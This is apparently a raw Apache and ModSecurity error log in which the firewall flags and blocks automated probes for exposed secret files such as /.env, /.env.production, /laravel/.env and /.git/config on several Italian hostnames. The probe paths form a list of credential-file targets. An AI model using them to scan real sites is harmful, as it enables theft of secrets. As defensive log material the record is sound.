[Fri Nov 28 15:29:01.569154 2025] [:error] [pid 383775] [client 34.245.11.111:54716] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aSmxrUM6gFne4-slYXlYrwAAABI"]
[Fri Nov 28 15:29:01.570985 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/exapi/.env"] [unique_id "aSmxra9FOLCsq7MColttBwAAAAE"]
[Fri Nov 28 15:29:01.571172 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/exapi/.env"] [unique_id "aSmxra9FOLCsq7MColttBwAAAAE"]
[Fri Nov 28 15:29:01.571333 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/exapi/.env"] [unique_id "aSmxra9FOLCsq7MColttBwAAAAE"]
[Fri Nov 28 15:29:02.076440 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aSmxrq9FOLCsq7MColttCAAAAAE"]
[Fri Nov 28 15:29:02.076694 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aSmxrq9FOLCsq7MColttCAAAAAE"]
[Fri Nov 28 15:29:02.076947 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aSmxrq9FOLCsq7MColttCAAAAAE"]
[Fri Nov 28 15:29:02.272476 2025] [:error] [pid 383775] [client 34.245.11.111:54716] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aSmxrkM6gFne4-slYXlYsAAAABI"]
[Fri Nov 28 15:29:02.272706 2025] [:error] [pid 383775] [client 34.245.11.111:54716] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aSmxrkM6gFne4-slYXlYsAAAABI"]
[Fri Nov 28 15:29:02.272958 2025] [:error] [pid 383775] [client 34.245.11.111:54716] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aSmxrkM6gFne4-slYXlYsAAAABI"]
[Fri Nov 28 15:29:02.639523 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/tools/.env"] [unique_id "aSmxrq9FOLCsq7MColttCQAAAAE"]
[Fri Nov 28 15:29:02.639731 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/tools/.env"] [unique_id "aSmxrq9FOLCsq7MColttCQAAAAE"]
[Fri Nov 28 15:29:02.639924 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/tools/.env"] [unique_id "aSmxrq9FOLCsq7MColttCQAAAAE"]
[Fri Nov 28 15:29:02.798122 2025] [:error] [pid 383775] [client 34.245.11.111:54716] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aSmxrkM6gFne4-slYXlYsQAAABI"]
[Fri Nov 28 15:29:02.798466 2025] [:error] [pid 383775] [client 34.245.11.111:54716] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aSmxrkM6gFne4-slYXlYsQAAABI"]
[Fri Nov 28 15:29:02.798666 2025] [:error] [pid 383775] [client 34.245.11.111:54716] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aSmxrkM6gFne4-slYXlYsQAAABI"]
[Fri Nov 28 15:29:03.813066 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/v2/.env"] [unique_id "aSmxr69FOLCsq7MColttCwAAAAE"]
[Fri Nov 28 15:29:03.813400 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/v2/.env"] [unique_id "aSmxr69FOLCsq7MColttCwAAAAE"]
[Fri Nov 28 15:29:03.813649 2025] [:error] [pid 387715] [client 34.245.11.111:55002] [client 34.245.11.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/v2/.env"] [unique_id "aSmxr69FOLCsq7MColttCwAAAAE"]
[Fri Nov 28 16:40:46.469744 2025] [:error] [pid 387729] [client 104.131.35.20:52326] [client 104.131.35.20] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSnCfiNGdhATNi61o2H_lwAAABY"]
[Fri Nov 28 16:40:46.470148 2025] [:error] [pid 387729] [client 104.131.35.20:52326] [client 104.131.35.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSnCfiNGdhATNi61o2H_lwAAABY"]
[Fri Nov 28 16:40:46.470432 2025] [:error] [pid 387729] [client 104.131.35.20:52326] [client 104.131.35.20] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSnCfiNGdhATNi61o2H_lwAAABY"]
[Fri Nov 28 18:34:04.953767 2025] [:error] [pid 387629] [client 45.139.104.171:45358] [client 45.139.104.171] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSndDD5upQdonQ7NnAka-gAAAAg"]
[Fri Nov 28 18:34:04.954055 2025] [:error] [pid 387629] [client 45.139.104.171:45358] [client 45.139.104.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSndDD5upQdonQ7NnAka-gAAAAg"]
[Fri Nov 28 18:34:04.954276 2025] [:error] [pid 387629] [client 45.139.104.171:45358] [client 45.139.104.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSndDD5upQdonQ7NnAka-gAAAAg"]
[Fri Nov 28 20:53:10.501424 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSn9pqsCtNc1QXFJ-Iu0vwAAABM"]
[Fri Nov 28 20:53:10.501782 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSn9pqsCtNc1QXFJ-Iu0vwAAABM"]
[Fri Nov 28 20:53:10.502016 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSn9pqsCtNc1QXFJ-Iu0vwAAABM"]
[Fri Nov 28 20:53:10.737461 2025] [:error] [pid 390797] [client 35.183.137.215:58110] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSn9pmav54iGRrCaHjosyQAAAAQ"]
[Fri Nov 28 20:53:10.737810 2025] [:error] [pid 390797] [client 35.183.137.215:58110] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSn9pmav54iGRrCaHjosyQAAAAQ"]
[Fri Nov 28 20:53:10.738038 2025] [:error] [pid 390797] [client 35.183.137.215:58110] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSn9pmav54iGRrCaHjosyQAAAAQ"]
[Fri Nov 28 20:53:11.176133 2025] [:error] [pid 387638] [client 35.183.137.215:58142] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSn9p-lfIsf8iBzToT1BOQAAABg"]
[Fri Nov 28 20:53:11.176367 2025] [:error] [pid 387638] [client 35.183.137.215:58142] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSn9p-lfIsf8iBzToT1BOQAAABg"]
[Fri Nov 28 20:53:11.176562 2025] [:error] [pid 387638] [client 35.183.137.215:58142] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSn9p-lfIsf8iBzToT1BOQAAABg"]
[Fri Nov 28 20:53:11.178023 2025] [:error] [pid 391538] [client 35.183.137.215:58176] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSn9p_4TiMKhYqgXYTJBjQAAABA"]
[Fri Nov 28 20:53:11.178213 2025] [:error] [pid 391538] [client 35.183.137.215:58176] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSn9p_4TiMKhYqgXYTJBjQAAABA"]
[Fri Nov 28 20:53:11.178388 2025] [:error] [pid 391538] [client 35.183.137.215:58176] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSn9p_4TiMKhYqgXYTJBjQAAABA"]
[Fri Nov 28 20:53:11.988779 2025] [:error] [pid 391532] [client 35.183.137.215:58254] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSn9p-pNjqKOvIlYLfVcXwAAAAk"]
[Fri Nov 28 20:53:11.989018 2025] [:error] [pid 391532] [client 35.183.137.215:58254] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSn9p-pNjqKOvIlYLfVcXwAAAAk"]
[Fri Nov 28 20:53:11.989193 2025] [:error] [pid 391532] [client 35.183.137.215:58254] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSn9p-pNjqKOvIlYLfVcXwAAAAk"]
[Fri Nov 28 20:53:12.751870 2025] [authz_core:error] [pid 391537] [client 35.183.137.215:58314] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env
[Fri Nov 28 20:53:13.590395 2025] [authz_core:error] [pid 391539] [client 35.183.137.215:58378] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env
